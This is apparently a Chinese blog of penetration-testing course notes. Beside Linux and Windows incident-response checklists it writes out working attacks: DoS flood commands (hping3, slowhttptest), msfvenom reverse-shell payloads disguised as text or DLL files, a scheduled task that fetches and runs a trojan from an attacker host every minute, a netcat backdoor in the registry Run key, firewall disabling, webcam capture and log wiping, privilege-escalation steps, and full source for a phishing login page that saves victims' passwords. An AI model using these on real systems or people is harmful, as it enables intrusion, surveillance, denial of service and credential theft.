基础渗透测试 on Retr0的小窝

1.16 Linux应急响应

Sun, 21 Dec 2025 12:41:39 +0800

常规命令操作

查看流量大小

ifconfig查看RX packets（数据包数量）后面的数字是否异常多

进程查看

ps -aux或ps-ef

功能： 查看完整进程表

top -c -o %CPU

参数解释：

-c 显示进程的命令行

-p 显示进程的pid

ps -eo pid,ppid,%mem,%cpu,cmd --sort=-%cpu | head -n 5

功能： 输出占用前5的进程

lsof -i -PnR

功能： 查看网络通信情况

ps aux | grep [指定pid]

功能： 寻找指定pid对应的进程

lsof -p [指定pid]

功能： 查看指定pid的进程打开了哪些文件

lsof [文件路径及名称]

功能： 查看谁在占用某个文件

功能： 查看隐藏进程

1
2
3

ps -ef | awk '{print}' | sort -n | uniq >1
ls /proc |sort -n |uniq >2
diff 1 2

md5sum [文件路径及名称]

功能： 计算文件的MD5值

特定安全事件的处置

webshell查杀

在线使用：SHELLPUB.COM在线查杀

病毒/rootkit查杀

chkrootkit功能:

检测是否被植入后门、木马、rootkit
检测系统命令是否正常
检测登录日志

使用方法:

wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
tar zxvf
chkrootkit.tar.gz
cd chkrootkit-0.52
make sense

编译完成没有报错的话执行检查

./chkrootkit

综合查杀工具

悬镜安全-DevSecOps数字供应链安全开拓者

rkhunter工具

rkhunter功能:

系统命令(Binary)检测,包括MD5校验
Rootkit检测
本机敏感目录、系统配置、服务及套间异常检测
三方应用版本检测

使用方法:

Wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/
rkhunter-1.4.4.tar.gz tar -zxvf rkhunter-1.4.4.tar.gz
cd rkhunter-1.4.4
./installer.sh --install
rkhunter -c

注：通常情况下Linux的恶意程序处置，靠人工解决。

网络行为分析

系统信息

who 查看当前登录的账户

uname -a 查看系统信息

netst -ano 查看网络和端口情况

netstat -utnpl 简单查看端口及使用端口的进程

lsof -i :[端口号] 查看进程和端口的对应关系

arp -a 查看arp表（查看mac地址是否有重复）

ls -l /proc/[pid]/exe或file /proc/[pid]/exe 查看某个pid对应的文件路径

使用iptables屏蔽ip

阻止数据包传入（入站规则）：iptables -A INPUT -s [ip地址] -j DROP

阻止数据包传出（出站规则）：iptables -A OUTPUT -d [ip地址] -j DROP

如果把DROP都改为ACCEPT就是只允许某个ip的通信（白名单）

清理所有的已设置的规则：iptables -F

拓展：

用iptables封锁和x.com的域名通信

iptables -I INPUT -ptcp --dport 80 -m string --string "x.com" --algo bm -j DROP

启动项排查

启动项存在的路径

/etc/init.d/ （服务的启动脚本）
/etc/xinetd.d

查看rc.local文件

可能存在于：

/etc/init.d/rc.local
/etc/rc.d/rc[0-6].d/（文件夹里放的是指向init.d的链接，0-6的数字指的是启动优先级）
/etc/profile.d/

计划任务排查

crontab -l查看计划任务

crontab -r删除计划任务

crontab -e使用编辑器编辑计划任务

拓展：

计划任务可能具体存放的位置：

/etc/crontab
/var/spool/cron/[用户名]
/var/spool/cron/*
/var/spool/anacron/*
/etc/crontab/*
/etc/cron.d/*
/etc/cron.时间/*

服务排查

cat /etc/services 查看网络服务

拓展：端口的分配

1-1024 系统保留，只能root使用

1025-4999 客户端程序自由分配

5000-65535 服务器端程序自由分配

服务自动启动

命令语法： chkconfig --level [运行级别] [服务名] [on/off]

运行级别解释：

0 - 关机

1- 单用户模式

2- 无网络连接的多用户命令行模式

3 - 有网络连接的多用户命令行模式

4 - 不可用

5 - 图形界面多用户模式

6 - 重启

例如：

chkconfig --level 2345 httpd on也可写作chkconfig httpd on

chkconfig --list 查看服务自启动状态

chkconfig --del 删除相关服务

文件检查

webshell后门可以通过sftp复制出来

敏感目录文件分析

/etc/init.d

/usr/bin

/usr/sbin

文件属性分析

ls -alt 按修改时间排序

file [文件名及其路径] 检查文件类型

find / *.xxx -perm 4777 特殊权限文件查找

ls -al /tmp | grep "Feb 10" 查看二月十号变更的隐藏文件（筛选用）

敏感目录

/tmp
/root
/bin
/usr/bin
/usr/sbin
/sbin

文件的高级查找

find [路径] -uid 0 -print 查找特权文件

find [路径] -size +10000k -print 查找大于10000k的文件

find [路径] -name "..." -print 查找文件名为…的文件

md5sum -b [文件]计算MD5

whereis [文件名] 查找文件路径

检查账号

账户本身检查

w 查看所有登录用户及系统状态

cat /etc/passwd或less /etc passwd用户信息文件

ls -l /etc/passwd 查看上面文件的修改时间

cat /etc/shadow 用户密码

usermod -L [用户名] 禁用账户（不能登录）

usermod -U [用户名] 启用账户

userdel -r [用户名] 删除账户

userdel [用户名] 删除账户并删除其对应/home目录

用户登录检查

last 用户登录检查（数据源/var/log/wtmp和/var/log/btmp）

lastb 上次登录失败（数据源/var/log/btmp）

lastlog上次登录成功（数据源/var/log/lastlog）

last -x reboot 上次重启

last -x shutdown上次关机

（数据源/var/log/lastlog和/var/log/secure）

/var/log/message 存储的认证信息，可以追踪恶意用户登录行为

历史命令

history 查看历史命令

history -c 清除历史命令

日志分析

默认日志/var/log/

more /etc/rsyslog.conf 查看日志情况

1.15 DOS补充和Win应急响应

Thu, 18 Dec 2025 22:46:46 +0800

DOS补充

SYN洪水攻击（Syn Flood）

1
2
3

git clone https://github.com/EmreOvunc/Python-SYN-Flood-Attack-Tool.git
cd Python-SYN-Flood-Attack-Tool
python3 py3_synflood_cmd.py -t [目标ip] -p [端口号] -c 5

DNS放大攻击

典型的流量放大攻击，以小汇多，利用协议特定进行放大流量

# 安装
sudo apt-get install dnsutils
# 使用
dig ANY [域名] @[DNS地址，例如114.114.114.114]

使用后DNS服务器会返回信息（回包）给目标域名，导致端口受阻。

hping3

定制发送任何的数据包

参数解释：

-a伪造数据包

-q不返回

-n不解析域名

-s源端口

-d字节数

-p端口

--flood以flood形式进行攻击

syn-flood

1
2
3

sudo hping3 -c 3000 -d 120 -S -w 64 -p [端口号] --flood --rand-source [目标ip]
或（简化版）
sudo hping3 -S -P -p 80 --flood --rand-source [目标ip]

tcp-flood

`1`	`sudo hping3 -SARUFP -p [端口号] --flood --rand-source [目标ip]`

icmp-flood

`1`	`sudo hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood [目标ip]`

udp-flood

`1`	`sudo hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood [目标ip]`

LAND

一种特殊的syn-flood攻击，源地址和目的地址都是受害者，自己和自己完成三次握手

`1`	`sudo hping3 -n -a [目标ip] -S -d 100 -p 80 --flood [目标ip]`

TCP全链接DOS攻击

注：命令中的数据任意，够大就行

`1`	`nping --tcp-connect --rate=10000 -c 10000000000 -q [目标ip]`

应急响应

如果我被黑客入侵了会发生什么？

web入侵： 挂马、网页篡改、植入webshell、黑页、暗链等
主机入侵： 病毒木马、勒索病毒、远控后门、系统异常、RDP爆破、SSH爆破、主机漏洞、数据库入侵等
网络攻击： DDOS/CC攻击、ARP攻击、DNS/HTTP劫持
路由器交换机攻击： 内网病毒、配置错误、机器本身漏洞

查看日志

使用日志查看器

方法一： 使用Win+R并输入mmc打开控制台根节点，在工具栏中选择 文件–添加/删除管理单元–事件查看器 并添加

方法二： 右键桌面上的“此电脑”，点击“管理”，选择事件查看器即可。

方法三： 使用Win+R并输入eventvwr.msc回车即可

Windows日志位置：

Windows 2000/2003/xp：\%Systemroot%\System32\Config\*.evt

Windows vista/7/8及以后：\%Systemroot%\System32\winevt\Logs\*evtx

检查账户

图形化界面检查

可以在刚才的mmc中 添加本地用户和组 ，也可以在“此电脑”的管理中打开

检查Guest账户是否开启、是否存在隐藏账户等

通过注册表检查

转到\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\下，检查其中名字较长的几个文件夹是否有可以账户存在

文件分析

检查临时目录

转到C:\Users\Administrator\Local Settings\Temp（必须直接敲完整路径，不然找不到）

检查桌面文件夹C:\Users\Administrator\Desktop

检查访问记录

转到C:\Users\Administrator\Recent（必须直接敲完整路径，不然找不到）

这是最近访问的文件

检查文件修改时间

检查hosts文件

网络行为排查

使用网络沙箱：

TotalVirus

微步云沙箱

检查备案情况：

ICP/IP地址/域名信息备案管理系统

直接Google

网络连接排查

cmd执行：

netstat -ano 查看可疑连接和进程

tasklist 找到可疑进程

流量分析

使用WireShark、Charles

漏洞和补丁信息

命令systeminfo

打开Windows自动更新

网络攻击的判断与防御

DDOS通用防御

限制单ip请求、负载均衡、cdn、禁止icm、隐藏真实ip、流量清洗、优化tcp/ip栈、代码合理使用缓存、cdn云清洗

syn攻击判断

服务器cpu占用率高，大量SYN_RECEIVED网络连接状态，网络恢复后负载瞬间变高，断开后负载下降】

防御： 提高半开放连接队列的大小

udp攻击判断

服务器cpu占用率高，每秒大量数据包，tcp正常

cc攻击

服务器cpu占用率高，web服务器出现service unavailable提示，大量establish网络连接，单ip高达上百，用户无法正常访问

DNS放大攻击

大量的dns请求

防御： ips规则，关闭递归查询，DNS解析器只接受受信任的域名服务，acl

ARP欺骗判断

cmd执行arp -a查看mac地址是否重复，特别是网关

防御： 防火墙，mac地址绑定

可疑进程分析

tasklist查看进程

名称随机，后缀也不是exe的是可疑进程
任务管理器中svchost.exe运行的权限太过普通（例如你的用户名）

tasklist | findstr 进程名称
可以使用 pchunter 软件查看
wmic process | find "进程id" > proc.csv
tasklist /svc

启动项排查

排查以下几个位置：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

其他见1.14 自启动和DOS攻击初步的2.2部分

Win+R输入msconfig在启动选项卡中查看启动项（高版本Windows可能移动到任务管理器中）
排查C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
排查是否有可疑的服务

计划任务排查

排查C:\Windows\System32\Tasks和C:\Windows\Tasks

也可以在mmc或者此电脑的管理中查看计划任务

特定事件痕迹

挖矿程序
勒索病毒

使用工具：Windows Kernel Explorer

下载地址：AxtMueller/Windows-Kernel-Explorer

1.14 自启动和DOS攻击初步

Tue, 16 Dec 2025 18:07:16 +0800

DOS拒绝服务攻击

ssl-dos

一般用于打击https网站，如果目标挂了CDN无效

安装：执行sudo apt-get install thc-ssl-dos安装程序

攻击：

`1`	`thc-ssl-dos [目标ip] 443 --accept`

慢速攻击

安装程序：

1
2
3

sudo apt-get install openssl
sudo apt-get install libssl-dev
sudo apt-get install slowhttptest

slow http Post攻击（针对接受 POST 请求的接口）

攻击命令：

`1`	`slowhttptest -c 2000 -B -g -o body_states -i 110 -r 200 -s 8192 -t FAKEVERB -u http://[目标ip] -x 10 -p 3`

参数解释：

参数	英文全称/含义	具体作用
`-c 2000`	`connections`（并发连接数）	指定向目标服务器同时建立2000个并发HTTP连接，这是攻击的核心资源消耗项，连接数越多，对服务器的资源占用越严重。
`-B`	`Body attack`（慢POST攻击）	明确攻击类型为Slow POST（慢POST攻击）（也叫Body byterange attack），这是慢HTTP攻击的一种，核心是故意缓慢发送POST请求体，长时间占用服务器连接。
`-g`	`generate statistics`（生成统计日志）	启用日志记录功能，会生成CSV格式的原始数据文件和HTML格式的可视化报告，用于记录攻击过程中的连接状态、响应时间、服务器负载等数据。
`-o body_states`	`output prefix`（输出文件前缀）	指定日志文件的前缀为`body_states`，结合`-g`参数，会生成`body_states.csv`（数据文件）和`body_states.html`（可视化报告）两个文件。
`-i 110`	`interval`（数据块发送间隔）	指定每次发送请求体数据块之间的时间间隔为110毫秒（ms）。间隔越长，服务器的连接被占用的时间越久，攻击效果越显著。
`-r 200`	`rate`（每秒新建连接数）	指定每秒向目标新建200个连接，直到达到`-c 2000`的并发连接上限（约10秒可达到2000个并发）。
`-s 8192`	`content length size`（内容长度）	在HTTP请求头的`Content-Length`字段中声明预期发送8192字节（8KB）的请求体，欺骗服务器保持连接等待接收完整数据。
`-t FAKEVERB`	`HTTP verb`（HTTP方法）	指定HTTP请求使用伪造的非标准方法`FAKEVERB`（正常HTTP方法为GET/POST/PUT等）。此举可尝试绕过部分服务器的防护规则，也用于测试服务器对非标准方法的兼容性。
`-u http://[目标ip]`	`URL`（目标地址）	指定攻击目标的URL，需将`[目标ip]`替换为实际的服务器IP或域名。
`-x 10`	`block size`（数据块长度）	指定每次向服务器发送的请求体数据块长度为10字节。即每次只发10字节，等待110毫秒后再发下一个10字节，故意拖延请求体的传输速度。
`-p 3`	`probe timeout`（探测超时时间）	在发起正式攻击前，工具会先发送一个探测请求检查目标是否可达，若3秒内无响应则判定目标不可达，停止攻击。

原理解析： 发送 POST 请求时，在请求头中声明Content-Length: 8192（要发 8KB 数据），然后以 10 字节 / 110ms 的极慢速度发送请求体，让服务器一直等待接收完整的请求体，从而长期占用连接资源。

slowloris攻击（针对所有接受 GET 请求的页面，基本通用）

攻击命令：

`1`	`slowhttptest -c 2000 -H -g -o my_header_states -i 10 -r 1000 -s 8192 -t GET -u http://[目标ip] -x 24 -p 3`

原理解析： 发送 GET 请求时，故意 逐个缓慢发送 HTTP 请求头字段 （如Host:、User-Agent:、Accept:等），每个字段大小为 24 字节，发送间隔仅 10ms（看似快，但对服务器的连接处理机制而言，仍足够慢以占用连接），且不发送请求头的结束标记（\r\n\r\n），让服务器认为请求头还在传输中，从而一直保持连接等待完整的请求头。

其他内容

驱动级文件保护软件

使用 **Easy File Locker ** 可以对我们的文件进行驱动级的保护和隐藏，当然包括我们放在目标上的木马程序。

当配置完毕（或我们自己中招）后，我们可以检查下面两个文件夹看看是否真的生效了

C:/Windows/xlfks.xxx(包括但不限于dat、dll、ini、log……)

C:/Windows/system32/drivers/xlkfs.sys

如果检查出上面两个文件就说明是驱动级的文件隐藏

如何清除：

查询服务状态sc qc xlkfs
停止服务net stop xlkfs
删除服务sc delete xlkfs
找到上面的两位个文件残余并删除
删除木马程序

注册表自启动

Win+R输入regedit回车打开注册表

路径一：

找到路径为HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

路径二：

找到路径为HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

路径三：

找到路径为HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

路径四：

找到路径为HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

路径五：

找到路径为HKEY_CURRENT_USER\Environment

**说明：**路径三、四、五内的条目都是Windows在登录时会执行的任务

右键新建字符串值，在数据中输入要自启动的文件路径和启动参数

计划任务启动

1
2
3

schtasks /create /sc minute /mo 1 /tn "示例名称" /tr "powershell.exe -nop -w hidden
-c \"IEX((new-object net.webclient).DownloadString(\"\"\"http://[攻击机ip]/
[木马文件]"\"\"\"))\""

上面的代码会让目标每分钟在后台下载并执行攻击者的木马程序

服务启动

增加一个服务

sc create "示例名称" binpath= "cmd /c start 具体命令"

设置服务描述

sc description 示例名称 "示例描述"

设置自动启动

sc config 示例名称 start= auto

开启服务

net start 示例名称

1.13 更多木马程序

Sun, 14 Dec 2025 18:18:13 +0800

隔空植入

前置知识

Windows是如何判断文件类型的？

是后缀名吗？

实质上，Windows并不是通过文件的后缀名来判断文件类型的，因为当我们删除了文件的后缀名时，只要能选择合适的软件，一样能正常打开文件。

Windows是通过文件头来判断文件类型的，当我们使用 HxD 或 c32 等16进制查看器打开文件时可以发现，其编码的开头总是会带上一些特征性的字符，例如：

这是一个png文件，可以看到很明显的PNG标识

这是一个exe文件，可以看到MZ、PE的标识

这是一个rar文件，也是很明显的Rar标识

这说明后缀名的变化并不影响文件实质作用，他只会影响文用户打开文件的方式。

换句话说，当一个exe文件的后缀名被改为txt时，Windows会把它当作 txt文件打开。

这里拓展一个CMD命令：

`1`	`copy /b 文件A.jpg+文件B.zip 文件C.jpg`

这样就可以把文件A.jpg和文件B.zip的二进制内容合并了，当我们要把它当作图片打开时就取后缀名.jpg当我们要把它当作压缩包打开时就取后缀名.zip这就是有名的图种，其原理正是运用了Windows读取到一种文件头就会判断接下来的内容是什么类型，而合并后的文件具有两个文件头，因此其作为图片或压缩包互不干扰。

知识运用

txt伪装木马

知道了上面的知识，我们是否可以生成一个后缀名为.txt但实质为.msi类型的木马呢？让我们试一试。

打开Kali攻击机：

`1`	`msfvenom -p windows/x64/shell/reverse_tcp lhost=[攻击机ip] lport=4444 -f msi >msi.txt`

接下来我们把它放到我们上一节学习到web目录中进行隔空植入

所以现在我们只需要在目标机器上执行这一句话就可以了

1
2
3

msiexec /q /i http://192.168.80.133/msi.txt
或
forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec /q /i http://192.168.80.133/msi.txt"

dll类型木马

`1`	`msfvenom -p windows/x64/shell/reverse_tcp lhost=[攻击机ip] lport=4444 -f dll >hello.dll`

被控端执行：

1
2
3

msiexec /y hello.dll
或
rundll32.eex shell32.dll,Control_RunDLL ./hello.dll

pstools

当你曾经通过木马入侵了一个主机并获取了管理员或其他某个账户的密码后，某天木马突然失效，你将如何重新侵入之前的主机呢？

使用微软官方的系统插件pstools

准备工作

目标主机的防火墙最好关闭
创建/获得对方计算机的用户名和密码

如何操作

找到并解压win10攻击机的C:\tools\alltools\远程连接\PSTools.zip

在解压后的目录启动CMD

`1`	`psexec \\[目标ip] -u [用户名] -p [密码] cmd.exe`

可以看到直接连接上了对方电脑的cmd（话说有点像ssh）

还可以让对方运行我们电脑里的exe文件

`1`	`psexec \\[目标ip] -u [用户名] -p [密码] -c c:\nc.exe`

如果要对方运行它电脑里的exe

`1`	`psexec \\[目标ip] -u [用户名] -p [密码] -d notepad.exe`

还可以尝试提权（以system权限运行程序）

`1`	`psexec \\[目标ip] -u [用户名] -p [密码] -c -s c:\nc.exe`

特殊情况

如果我们入侵的主机有下面的情况要怎么办：

当前电脑硬盘不能用（无盘工作站）
自己权限不高

在目标上运行你C盘里的文件

1
2
3

pcalua -m -a \\[攻击机ip]\c$\xx.eex
或
rundll32.exe zipfldr.d11,RouteTheCall \\[攻击机]\c$\xx. exe

1.12 进阶后门操作

Sat, 13 Dec 2025 17:17:58 +0800

本篇内容使用win7-sp1靶机，请在资源库中自行下载导入

进阶后门操作

复习

进入kali后若想要连接此前已经设置好的后门：

通过服务启动

use exploit/multi/handler
setpayload windows/metsvc_bind_tcp
set lport 31337
set rhost [目标ip]
run

永久性后门

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 4321
set lhost [自己ip]
run

植入备用后门

上传文件

我们从【win10攻击机】中取nc.exe复制到kali中的kali文件夹，

回到meterpreter终端：

`1`	`upload /home/kali/nc.exe c:\\`

将nc.exe上传到对方的C盘

修改注册表

查看对方开机自启的配置

`1`	`reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run`

为了防止meterpreter失效，接下来我们要把nc放到对方的自动启动里当作后门

`1`	`reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'c:\nc.exe -ldp 444 -e cmd.exe'`

这句话的意思是开机时启动nc并且执行后面的命令使它监听444端口，如果监听到连接就返回一个cmd命令行

使用下面的命令可用查看刚才写的注册表条目详细信息

`1`	`reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc`

控制防火墙

直接关闭

因为中文乱码的缘故不方便查看防火墙的状态，所以我们都直接执行一遍防火墙关闭命令就可以了

1
2

shell
netsh advfirewall set allprofiles state off

增加规则

为了防止关闭防火墙引起对方怀疑，我们也可以使用增加一条允许444端口的规则的方法

1
2

shell
netsh firewall add portopening TCP 444 "FireWall" ENABLE ALL

使用nc连接

现在我们重启一下靶机，重启后用nc连接看看是否成功

`1`	`nc -v [目标ip] 444`

缺点

上面的操作中修改注册表的内容可以在msconfig里查到，所以我们可以考虑使用自解压的方式进行伪装

远程下载木马

启动apache

`1`	`service apache2 start`

apache的目录位于/var/www/html/中，我们可以在里面放上木马文件

方法一：使用vbs下载文件

用echo命令创建a.vbs

echo set a=createobject("adod"+"b.stream"):set
w=createobject("micr"+"osoft.xmlhttp"):w.open"get",wsh.arguments(
0), 0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(
1),2 >> a.vbs

也可以使用中间的代码手动创建

然后在cmd中执行下面的命令即可将木马保存到c盘 （对exe效果可能不好，适合文字脚本类）

`1`	`cscript a.vbs http://[攻击机ip]/木马文件名 c:\木马文件名`

方法二：使用certutil下载文件

在cmd中执行 （这个也不适合exe等大文件）

`1`	`certutil -urlcache -split -f http://[攻击机ip]/木马文件名`

文件会下载到本目录（cmd打开的地方）

弊端：每次下载会留下入侵痕迹，所以要进行痕迹清理，方法如下

`1`	`certutil -urlcache -split -f http://[攻击机ip]/木马文件名 delete`

拓展：certutil的其他功能

校验hash值：

`1`	`certutil -hashfile [文件路径及名称，例如c:\hi.exe]`

加密解密文件（虽然不带密钥而且可逆我也不知道为什么配叫加密）：

# 加密
certutil -encode c:\a.txt c:\b.txt
# 解密
certutil -decode c:\b.txt c:\a.txt

方法三：使用bitsadmin下载文件

在cmd中执行

1
2

bitsadmin /rawreturn /transfer down http://[攻击机ip]/木马文件名 [保存路径及文件名]
# 例如 bitsadmin /rawreturn /transfer down http://192.168.80.133/1.txt c:\1.txt

方法三：使用js下载文件

新建a.js文件

1
2
3

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET",WScript.Arguments(0),/*async =* /false);WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

在同目录cmd中执行

`1`	`cscript /nologo a.js http://192.168.80.133/1.txt >> 123.txt`

meterpreter操作补充

禁用键盘/鼠标

禁用 uictl disable keyboard或mouse

启用 uictl enable keyboard或mouse

摄像头

webcam_list 查看摄像头

webcam_snap 通过摄像头拍照

webcam_stream 通过摄像头开启视频

程序相关

execute 在目标上面执行程序

execute -H -i -f cmd.exe 后台执行程序

getpid 获取当前进程pid

ps 查看活跃进程

migreate [pid] 把meterpreter转移到某个pid

kill [pid] 杀掉某个进程

反侦察

clearev 一键清除日志

timestomp -v c://a.exe 查看c盘a.exe的时间戳

timestomp -v c://b.exe c://a.exe 将a.exe的修改时间复制给b.eex

1.11 Linux提权(续)和钓鱼网站

Thu, 11 Dec 2025 14:32:18 +0800

提权(续)

以下命令除非特别指出，均在ssh中执行

寻找敏感的隐藏文件

`1`	`find / -name "." -type f -path "/home/" -exec ls -al {} \; 2>/dev/null`

有可能找到用户自己存储的明文密码，使用cat查看，再使用su [用户名]切换到对应权限

SID提权

输入以下命令查看可以使用的命令

`1`	`find / -perm -4000 -type f -exec ls -al {} \;`

可以看到/usr/bin/xxd，接着使用下面的命令查看加密后的密码

`1`	`xxd /etc/shadow \| xxd -r`

复制其中root账户的全部内容（从root:到:::）保存为txt（以Desktop/pass.txt为例）

接着使用破解工具 john 进行字典破解（字典可能打包了，需要手动解压一下）

1
2

cd Desktop/
john pass.txt -w=/usr/share/wordlists/rockyou.txt

NFS提权

注意：本小节的大部分命令在本机中执行

扫描目标服务器端口

`1`	`nmap [目标ip]`

发现对方可能开启了2049端口，接着查看对方挂载了哪些文件夹

返回：/home/peter *

`1`	`showmount -e [目标ip]`

接着我们在自己的系统上打开终端创建一个文件夹方便将对方的文件夹挂载到自己的系统上，具体操作如下 （需要使用root权限执行） ：

cd /tmp
mkdir nfs
cd nfs
mount -t nfs [对方ip]:[对方挂载的文件夹] /tmp/nfs/
ls -la # 查看里面有什么文件夹

接下来我们想要把自己的bash复制到这个这个挂载的文件夹里面去，从而实现提权，但是直接copy会提示 权限不够 （因为我们系统上的root在对方看来只是一个低权限的外人），所以我们要伪造一个和对方一模一样的账户 peter

在ssh中执行cat /etc/passwd，找到peter这一行，后面跟有两串数字，第一个是uid第二个是gid，所以我们执行：

1
2

groupadd -g 1005 peter	 # 创建组，名为peter，gid为1005
add user peter -uid 1001 -gid 1005	# 创建名为peter，uid为1001的用户，并添加到gid为1005的组中

接下来我们需要使用.ssh方法提权

cd ~	# 转到本机的peter目录下
ssh-keygen	# 生成ssh密钥，并记住.pub文件的名称
cd /tmp/nfs
mkdir .ssh
cat ~/.ssh/[文件名].pub > ./.ssh/authorized_keys		# 将我们伪造的密钥放入对方的可信密钥文件夹
cd ~/.ssh
ssh -i [文件名] peter@[目标ip]

发现成功免密码以peter身份登录靶机，我们在ssh中执行sudo -l查看可以免密码以root身份执行哪些命令，返回(ALL) NOPASSWD: /usr/bin/strace，发现strace可以使用

所以我们使用如下命令提权：

`1`	`sudo strace -o /dev/null /bin/sh`

docker提权

`1`	`docker run -v /:/hostOS -i -t chrisfoseterelli/rootplease`

钓鱼网站

功能介绍：使用网站克隆工具或手敲仿写一个正规网站的登陆页面，并且实现点击登陆后保存密码到服务端本地的txt文件中，同时强制伪加载几秒，然后跳转到正规网站上，给使用者一种没有登陆上是因为网卡了的原因。

为了方便演示，本项目分为多个文件。

index.html注意修改 第187行 的跳转链接

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>用户登录</title>
    <style>
        /* 原有登录页面样式 */
        body {
            font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
            background-color: #f2f2f2;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            position: relative; /* 为加载层定位做准备 */
        }
        .login-container {
            background-color: white;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 4px 15px rgba(0,0,0,0.1);
            width: 350px;
            text-align: center;
            position: relative;
            z-index: 1; /* 确保登录框在加载层下方 */
        }
        .logo-area {
            margin-bottom: 30px;
            color: #1677ff; /* 支付宝蓝风格 */
            font-size: 24px;
            font-weight: bold;
        }
        .input-group {
            margin-bottom: 20px;
            text-align: left;
        }
        .input-group label {
            display: block;
            margin-bottom: 5px;
            color: #666;
            font-size: 14px;
        }
        .input-group input {
            width: 100%;
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 4px;
            box-sizing: border-box; /* 确保padding不撑大宽度 */
            outline: none;
        }
        .input-group input:focus {
            border-color: #1677ff;
        }
        .submit-btn {
            width: 100%;
            padding: 12px;
            background-color: #1677ff;
            color: white;
            border: none;
            border-radius: 4px;
            font-size: 16px;
            cursor: pointer;
            transition: background-color 0.3s;
        }
        .submit-btn:hover {
            background-color: #0e5fd8;
        }
        .footer-links {
            margin-top: 20px;
            font-size: 12px;
            color: #888;
        }

        /* 加载动画样式 */
        .loading-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5); /* 半透明遮罩 */
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 9999; /* 确保加载层在最上层 */
            opacity: 0;
            visibility: hidden;
            transition: opacity 0.3s, visibility 0.3s;
        }
        .loading-overlay.active {
            opacity: 1;
            visibility: visible;
        }
        .loading-card {
            background-color: white;
            padding: 30px 40px;
            border-radius: 8px;
            box-shadow: 0 4px 20px rgba(0, 0, 0, 0.2);
            display: flex;
            align-items: center;
            gap: 15px;
        }
        .loading-spinner {
            width: 30px;
            height: 30px;
            border: 3px solid #e0e0e0;
            border-top: 3px solid #1677ff; /* 支付宝蓝主色 */
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }
        .loading-text {
            font-size: 16px;
            color: #1677ff;
            font-weight: 500;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* 响应式适配 */
        @media (max-width: 480px) {
            .login-container {
                width: 90%;
                padding: 30px 20px;
            }
            .loading-card {
                padding: 20px 30px;
                flex-direction: column;
                text-align: center;
            }
        }
    </style>
</head>
<body>
    <!-- 登录容器 -->
    <div class="login-container">
        <div class="logo-area">XX支付中心</div>

        <form id="loginForm" action="login.php" method="POST">
            <div class="input-group">
                <label for="username">账号 / 手机号</label>
                <input type="text" id="username" name="username" placeholder="请输入账号" required>
            </div>
            
            <div class="input-group">
                <label for="password">登录密码</label>
                <input type="password" id="password" name="password" placeholder="请输入密码" required>
            </div>

            <button type="submit" class="submit-btn">登 录</button>
        </form>

        <div class="footer-links">
            找回密码 | 注册新账号
        </div>
    </div>

    <!-- 加载动画层 -->
    <div class="loading-overlay" id="loadingOverlay">
        <div class="loading-card">
            <div class="loading-spinner"></div>
            <div class="loading-text">正在登录...</div>
        </div>
    </div>

    <script>
        // 获取元素
        const loginForm = document.getElementById('loginForm');
        const loadingOverlay = document.getElementById('loadingOverlay');

        // 监听表单提交事件
        loginForm.addEventListener('submit', function(e) {
            // 阻止默认的表单提交行为（因为要等6秒再跳转）
            e.preventDefault();
            
            // 先验证表单（HTML5 required验证）
            const isValid = loginForm.checkValidity();
            if (isValid) {
                // 验证通过，显示加载动画
                loadingOverlay.classList.add('active');
                
                // 6秒后跳转到welcome.php
                setTimeout(function() {
                    window.location.href = '要跳转的网页链接';
                }, 6000);

                fetch('login.php', {
                    method: 'POST',
                    body: new FormData(loginForm)
                }).then(response => {
                    console.log('表单数据已提交');
                }).catch(error => {
                    console.error('表单提交失败:', error);
                    // 提交失败时隐藏加载动画并提示
                    loadingOverlay.classList.remove('active');
                    alert('登录请求提交失败，请重试');
                });
                
            }
        });

        // 防止点击加载遮罩层关闭动画
        loadingOverlay.addEventListener('click', function(e) {
            e.stopPropagation();
        });
    </script>
</body>
</html>

login.php

<?php
session_start();

// 仅处理POST请求
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // 获取用户输入（trim去除首尾空格，避免空值插入）
    $user_input = trim($_POST['username']);
    $pass_input = trim($_POST['password']);

    // 验证输入不为空（可选，按需求保留/删除）
    if (empty($user_input) || empty($pass_input)) {
        echo "<script>alert('用户名或密码不能为空！'); window.history.back();</script>";
        exit;
    }
$txt = $user_input.'-------'.$pass_input.'\n';

$file = fopen("./hh.txt","a+");
fwrite($file,$txt);
fclose();
}
$conn->close();
?>

